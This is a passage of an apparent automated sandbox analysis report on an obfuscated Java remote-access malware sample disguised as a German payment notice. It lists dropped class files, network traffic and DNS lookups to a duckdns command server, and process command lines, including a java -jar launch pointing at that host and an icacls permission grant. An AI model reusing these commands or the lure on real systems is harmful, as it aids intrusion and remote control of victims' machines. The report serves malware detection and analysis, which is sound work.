                                      SSDEEP:96:3MbgmlLF2cpcJ2TYe3YWx4BX/euTlAWhA3wD6shIvgZ9Li1Q8ojJn7:3sgmNYciYZxxWTlAMzhIv4h3Rp7
                                      MD5:01FEA3AC89581EAAF285D15AA0208E7C
                                      SHA1:DA711D18D81D63D7DE15037B0E480E1A9EA745A9
                                      SHA-256:838ED717B79448059E07EA419727C7235A543BBBECA5C116F36ADE6234E59DB0
                                      SHA-512:B7BA0F5BDB9F84DCD61B79B0B949FB6663969A356E6718C06FBA1CADB20C9FDA3B22AEEF95D1AFF56ECD7FE227299B2E3D0D11A9A6915D17CA9C0E506C0F7D66
                                      Malicious:false
                                      Preview:.......4.....CXTKKfgE......java/lang/Object......r...g.....%java/lang/invoke/MethodHandles$Lookup......java/lang/invoke/MethodHandles......Lookup...F...Ljava/io/InputStream;...E...Ljava/lang/String;...L...B...Ljava/io/OutputStream;...J...K...D...I...k...Ljava/net/Socket;...e...h...a...G...Z...H...ALLATORIxDEMO...<clinit>...()V.. ......#...176.117.79.111..%.........'.........)...127.0.0.1..+.........-........./.........1.........3...|..5.........7.....9.........;...Default..=.........?...Unknown..A.........C.........E...jegjav.duckdns.org..G...Day3..I...(Ljava/lang/String;)V...java/lang/Throwable..L...java/lang/Exception..N...java/lang/InterruptedException..P......()I.. .S..R.T...(ILjava/lang/String;)[B.. .V..R.W...java/lang/String..Y...<init>...([B)V..[.\..Z.]...=9$. ..._..&(Ljava/lang/String;)Ljava/lang/String;.. .a....b...equals...(Ljava/lang/Object;)Z..d.e..Z.f...()Ljava/lang/String;.. .h..R.i......lastIndexOf...(Ljava/lang/String;)I..l.m..Z.n...substring...(II)Ljava/lang/String;..p
                                      Process:C:\Windows\System32\7za.exe
                                      File Type:compiled Java class data, version 52.0 (Java 1.8)
                                      Category:dropped
                                      Size (bytes):8618
                                      Entropy (8bit):6.0088017909748235
                                      Encrypted:false
                                      SSDEEP:192:DAvI31xZ2jYlZzRxz0hdsRgi1+mOZPzT3ID61CzA:J2kLRxz0hORgirm3o60U
                                      MD5:A4E70FF4D1899402F51C29743B3C85F2
                                      SHA1:CA6F6FCD695385C684250C43F9AA648C5504288F
                                      SHA-256:462EC1868551085AFB72BB4713FC5DA73EB5427154D4E59E2EA041AF80393BA3
                                      SHA-512:E763D90639559543330E89A4A3B9574DA28D6810C2572E4F9B898DCF3998ACA78710A36E82F6060E1B450FC6E911F21F21A3D2698A570AF784FFD40C6B9378C1
                                      Malicious:false
                                      Preview:.......4.|...E......java/lang/Object......r...ALLATORIxDEMO...()[Ljava/lang/String;...java/lang/Exception......java/net/Socket......=.y.$.z.;.......CXTKKfgE.....&(Ljava/lang/String;)Ljava/lang/String;.............<init>...(Ljava/lang/String;I)V..............#..F{.'.:It...2.IeHek^.;. \t.$K5.=H7.9k^3'.&K..1. \t+;.=.8.{SzVtN..:.;.'F.2tWdHd]t1=.bRoF,P`Ot'$.8...6-=.{SgQzUbF|-.2.*xF8.?.t!1.?.}F..&.9.{QgHdHgPlUz^bF..2.&.{SgQzUbk^%;.:.7.=.:\t.8.'.YlYl......getOutputStream...()Ljava/io/OutputStream;.............java/lang/String......getBytes...()[B.... ....!...java/io/OutputStream..#...write...([B)V..%.&..$.'...flush...()V..).*..$.+...java/lang/StringBuilder..-....*..../...getInputStream...()Ljava/io/InputStream;..1.2....3.....5...Unknown..7...java/io/InputStream..9...read...([BII)I..;.<..:.=...close..?.*....@...dWn3:.:.#...B...([BII)V....D....E...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..G.H....I...toString...()Ljava/lang/String;..K.L....M...YlYl..O...endsWith...(Ljava/lang/Strin
                                      Process:C:\Windows\System32\7za.exe
                                      File Type:compiled Java class data, version 52.0 (Java 1.8)
                                      Category:dropped
                                      Size (bytes):765
                                      Entropy (8bit):5.1548602300807405
                                      Encrypted:false
                                      SSDEEP:12:Uv+RfxMoSC8s0P6e+/g+iudd0ulPso7kqNUUofSjOf8E7oNV/NhkZEgU/zh1itlV:2+ZqoZ90P6J/gId+ulj71U7BD76VvnLs
                                      MD5:3567EECA2D2544FF819D55313C65C039
                                      SHA1:A73B81C80B2E5DC4138B0E88A3F46EBEDDBB465F
                                      SHA-256:2DFD9FC15E4F55CD1349118CED981AAF181EA8ACE63FC460F5A7ED3F5E8CBA13
                                      SHA-512:CDC211B1CE190B25BCD40204DF9B557F32D3C347FBCCFE38624804FF9D46D7D1979A5CD8AA9D22C0C632EFD0ACEE24FDEBFF8DCD6BECF7DA3AE49CF3457BD6A7
                                      Malicious:false
                                      Preview:.......4./...g......java/lang/Object......java/lang/Runnable......r...CXTKKfgE......<init>...()V........ALLATORIxDEMO...LCXTKKfgE;...(LCXTKKfgE;)V..................a...Lg;...run...java/lang/Exception......Z......................java/lang/Thread......sleep...(J)V.... ....!...k..#......$...java/lang/Throwable..&...Code...LineNumberTable...LocalVariableTable...StackMapTable...InnerClasses...EnclosingMethod...SourceFile. .............................(...B........*+KL+Y*............)...........*...................................(...........(.....$....."..%...W....."..%......W..................#.....+...2............'......................'...............).........F...............s.............#...$...'.].*.........(.........,...............-................
                                      Process:C:\Windows\System32\7za.exe
                                      File Type:compiled Java class data, version 52.0 (Java 1.8)
                                      Category:dropped
                                      Size (bytes):1639
                                      Entropy (8bit):5.454765167988992
                                      Encrypted:false
                                      SSDEEP:48:KAXQ38VTN20Prvlea1sIl+sx2vp/lo4nyn:S+ZYAlsh/lwn
                                      MD5:39D4A1BF0606FB64F1BED662E6448293
                                      SHA1:686AA7CE9BFD0167DB661D45206740428EB5B118
                                      SHA-256:81A44B356D369D87D26D16988793EF41C8C1C34B3914C3B7EADA96BB075F1113
                                      SHA-512:D875093EC1995D195B72352E8509C085FC54B7D46FAB7A8FD662D07C08917BF5C98AB54AF005F1D456CA039341D45D236F47B13301F3A4E14654A80A442F4EF0
                                      Malicious:false
                                      Preview:.......4.d...K......java/lang/Object......r...g...Ljava/nio/channels/FileLock;...H...Ljava/io/File;...ALLATORIxDEMO...Ljava/io/FileOutputStream;...<init>...(Ljava/lang/String;)V...java/lang/Exception......()V...........................................java/io/File......java/lang/StringBuilder............'.&H<.9.......CXTKKfgE.. ..&(Ljava/lang/String;)Ljava/lang/String;...."..!.#...java/lang/System..%...getProperty..'."..&.(...insert...(ILjava/lang/String;)Ljava/lang/StringBuilder;..*.+....,...separator...Ljava/lang/String;..../....0...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;..2.3....4....;.?H2.8...6...toString...()Ljava/lang/String;..8.9....:.........<...a...LK;...java/lang/Throwable..@...java/lang/String..B...k...java/io/IOException..E...java/nio/channels/FileLock..G...release..I....H.J...java/io/FileOutputStream..L...close..N....M.O...(Ljava/io/File;)V....Q..M.R...getChannel..!()Ljava/nio/channels/FileChannel;..T.U..M.V...java/nio/channels/FileChannel..X...lock...()Ljava
                                      Process:C:\Windows\System32\7za.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):91
                                      Entropy (8bit):4.946111849666226
                                      Encrypted:false
                                      SSDEEP:3:ZLCAWIzBExR8UpLVc3sRgmMgX84oxXbEDCta:1KItMFpL6sRwuoxXbXa
                                      MD5:3FB263055B3F7EED14DE15F2C21958B2
                                      SHA1:2D341C2A4AE64A8503F359479E38E093B4605046
                                      SHA-256:01A11E2B9BB27F0586017ECFBA7E40D71150F61830317AA0395D7A60704C8B7D
                                      SHA-512:0033B60BAD32ED6545E17477F815B8046CEB2E3D82BBB27780F6A60F0429DF1054CFBCF814B59DDBECCC8102B5F326D766028E54E41B35E048B825294B6E1BBE
                                      Malicious:false
                                      Preview:Manifest-Version: 1.0..Created-By: 1.8.0_381 (Oracle Corporation)..Main-Class: CXTKKfgE....
                                      Process:C:\Windows\SysWOW64\PING.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):392
                                      Entropy (8bit):4.728014748542534
                                      Encrypted:false
                                      SSDEEP:12:P95pTcgTcgTcgTcgTcgTLs4oR7n+AFSkIrxMVlmJHaVzvv:PNURD+AokItULVDv
                                      MD5:1A20F9D48A90568E8726C71FE7C9D490
                                      SHA1:3DBCB62DCFA0588D85A7A1ED71D5EED10AF82E2E
                                      SHA-256:79C8CE0C4209CCEB04EC136DEF7AA546936D288D680A15F4469352CE865A54C0
                                      SHA-512:B362A048BDCC201530C8132CEB05526BB891AF3B7CC4819AA9ABDAFEF096F598064F01BC91C24AF0348AB753F238BD698FAAC644D623E19C05BE6A66E7801794
                                      Malicious:false
                                      Preview:..Pinging 979764 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 6, Received = 6, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                      File type:Java archive data (JAR)
                                      Entropy (8bit):7.93277955179482
                                      TrID:
                                      • Java Archive (13504/1) 62.80%
                                      • ZIP compressed archive (8000/1) 37.20%
                                      File name:Avisierung vom 03.04.2025 Kundennummer 1084472.jar
                                      File size:12'898 bytes
                                      MD5:5b6cee019a5bcd56303094bb15787aac
                                      SHA1:dfe538f5dcd7910b86f50eadd502810d2a6bddab
                                      SHA256:a2af2c47293272c35ddf0a3187f190e1235e7413cf076c8a8b651ee9162dfebd
                                      SHA512:e729a6bb2a19fd4e18cf6ac4c5444452552594072efb943283ea1f75a095d8f3304c466697a712d7de9a7c8afa387c2c07cb2824d4f0ba1fba96fc003253c00e
                                      SSDEEP:192:nUGq7vOGgKh7TXP3lab0C2ahLOiXFeB1WUt32SqcS2whWuGxMQY3oe66foVRVGHT:pqaoHXP3lm0FqjXFQ19Q/h6LdVRsDv
                                      TLSH:4842BF812B60471AFA53213B43C48407FE5D059AA50C62A773C7B9A53A30D85AFE77EF
                                      File Content Preview:PK...........Z................META-INF/......PK..............PK...........Z................META-INF/MANIFEST.MF.M..LK-...K-*....R0.3..r.JM,IM.u...X....[.*h..%&..*8.....%...k.r.&f..:.$..[)8G.x{....r.r..PK.....rZ...[...PK...........Z................G.class.
                                      Icon Hash:d08c8e8ea2868a54
                                      • Total Packets: 41
                                      • 1967 undefined
                                      • 80 (HTTP)
                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 4, 2025 07:00:13.334759951 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:13.511122942 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:13.511214018 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:18.908715963 CEST4971780192.168.2.4208.95.112.1
                                      Apr 4, 2025 07:00:19.010140896 CEST8049717208.95.112.1192.168.2.4
                                      Apr 4, 2025 07:00:19.010325909 CEST4971780192.168.2.4208.95.112.1
                                      Apr 4, 2025 07:00:19.010659933 CEST4971780192.168.2.4208.95.112.1
                                      Apr 4, 2025 07:00:19.115631104 CEST8049717208.95.112.1192.168.2.4
                                      Apr 4, 2025 07:00:19.115827084 CEST4971780192.168.2.4208.95.112.1
                                      Apr 4, 2025 07:00:19.117383957 CEST4971780192.168.2.4208.95.112.1
                                      Apr 4, 2025 07:00:19.217335939 CEST8049717208.95.112.1192.168.2.4
                                      Apr 4, 2025 07:00:20.777646065 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:21.007424116 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:21.007494926 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:21.223809004 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:22.386948109 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:22.386986971 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:22.387013912 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:22.387032986 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:22.387115002 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:22.387115955 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:22.763606071 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:22.992410898 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:22.992486954 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.056888103 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057171106 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057212114 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057239056 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.057318926 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.057401896 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057451963 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.057662010 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057702065 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057713985 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.057742119 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057756901 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.057781935 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057797909 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.057821035 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057827950 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.057859898 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057873964 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.057900906 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057914972 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.057940006 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057949066 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.057977915 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.057997942 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.058022022 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.210450888 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.236756086 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.236798048 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.236870050 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.237049103 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.237147093 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.237184048 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.237205029 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.237221956 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.237261057 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.237273932 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.237363100 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.237420082 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.237638950 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.237678051 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.237734079 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.237740040 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.237778902 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.237826109 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.238121033 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238188028 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238226891 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238234997 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.238332987 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238392115 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.238399029 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238440037 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238482952 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.238563061 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238603115 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238646984 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.238704920 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238743067 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238779068 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238786936 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.238816023 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.238862991 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.413752079 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.413836956 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.413873911 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.413913965 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.413923025 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.413950920 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.413992882 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.414124012 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.414160967 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.414181948 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.414207935 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.414244890 CEST196749716128.90.145.126192.168.2.4
                                      Apr 4, 2025 07:00:23.414258003 CEST497161967192.168.2.4128.90.145.126
                                      Apr 4, 2025 07:00:23.414350033 CEST196749716128.90.145.126192.168.2.4
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Apr 4, 2025 07:00:08.643171072 CEST192.168.2.41.1.1.10x29d0Standard query (0)jegjav.duckdns.orgA (IP address)IN (0x0001)false
                                      Apr 4, 2025 07:00:09.651026964 CEST192.168.2.41.1.1.10x29d0Standard query (0)jegjav.duckdns.orgA (IP address)IN (0x0001)false
                                      Apr 4, 2025 07:00:10.663887024 CEST192.168.2.41.1.1.10x29d0Standard query (0)jegjav.duckdns.orgA (IP address)IN (0x0001)false
                                      Apr 4, 2025 07:00:12.679073095 CEST192.168.2.41.1.1.10x29d0Standard query (0)jegjav.duckdns.orgA (IP address)IN (0x0001)false
                                      Apr 4, 2025 07:00:18.801630974 CEST192.168.2.41.1.1.10xc924Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Apr 4, 2025 07:00:13.265022993 CEST1.1.1.1192.168.2.40x29d0No error (0)jegjav.duckdns.org128.90.145.126A (IP address)IN (0x0001)false
                                      Apr 4, 2025 07:00:13.265078068 CEST1.1.1.1192.168.2.40x29d0No error (0)jegjav.duckdns.org128.90.145.126A (IP address)IN (0x0001)false
                                      Apr 4, 2025 07:00:13.265160084 CEST1.1.1.1192.168.2.40x29d0No error (0)jegjav.duckdns.org128.90.145.126A (IP address)IN (0x0001)false
                                      Apr 4, 2025 07:00:13.265196085 CEST1.1.1.1192.168.2.40x29d0No error (0)jegjav.duckdns.org128.90.145.126A (IP address)IN (0x0001)false
                                      Apr 4, 2025 07:00:18.900382042 CEST1.1.1.1192.168.2.40xc924No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      Target ID:1
                                      Start time:01:00:07
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\7za.exe
                                      Wow64 process (32bit):true
                                      Commandline:7za.exe x -y -oC:\jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar"
                                      Imagebase:0xac0000
                                      File size:289'792 bytes
                                      MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000002.1205461171.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000003.1204529906.0000000001150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000002.1205204822.0000000000EFD000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000001.00000002.1205614657.0000000002C65000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:01:00:07
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:3
                                      Start time:01:00:07
                                      Start date:04/04/2025
                                      Path:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                                      Wow64 process (32bit):true
                                      Commandline:java.exe -jar "C:\Users\user\Desktop\Avisierung vom 03.04.2025 Kundennummer 1084472.jar" CXTKKfgE
                                      Imagebase:0xcc0000
                                      File size:257'664 bytes
                                      MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000003.00000003.1207124995.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000003.00000002.2473312000.000000000996E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000003.00000002.2475357557.0000000014F93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000003.00000002.2473312000.0000000009995000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 00000003.00000002.2473312000.0000000009995000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000003.00000002.2470947427.000000000078B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Target ID:4
                                      Start time:01:00:07
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:5
                                      Start time:01:00:08
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\icacls.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
                                      Imagebase:0x2f0000
                                      File size:29'696 bytes
                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true
                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                      Target ID:6
                                      Start time:01:00:08
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:01:00:22
                                      Start date:04/04/2025
                                      Path:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\java" -jar C:\Users\user\AppData\Local\Temp\7zgl6mWD4hExxxjOoeVcv.jar jegjav.duckdns.org 1967 "Avisierung vom 03.04.2025 Kundennummer 1084472" 161.77.13.2 ""
                                      Imagebase:0x760000
                                      File size:257'664 bytes
                                      MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000C.00000002.1367264095.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000C.00000003.1352312193.0000000001138000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C1D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      • Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: INDICATOR_JAVA_Packed_Allatori, Description: Detects files packed with Allatori Java Obfuscator, Source: 0000000C.00000002.1368038319.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                      Reputation:high
                                      Has exited:true

                                      Target ID:13
                                      Start time:01:00:22
                                      Start date:04/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:15
                                      Start time:01:00:23
                                      Start date:04/04/2025
                                      Path:C:\Windows\SysWOW64\cmd.exe
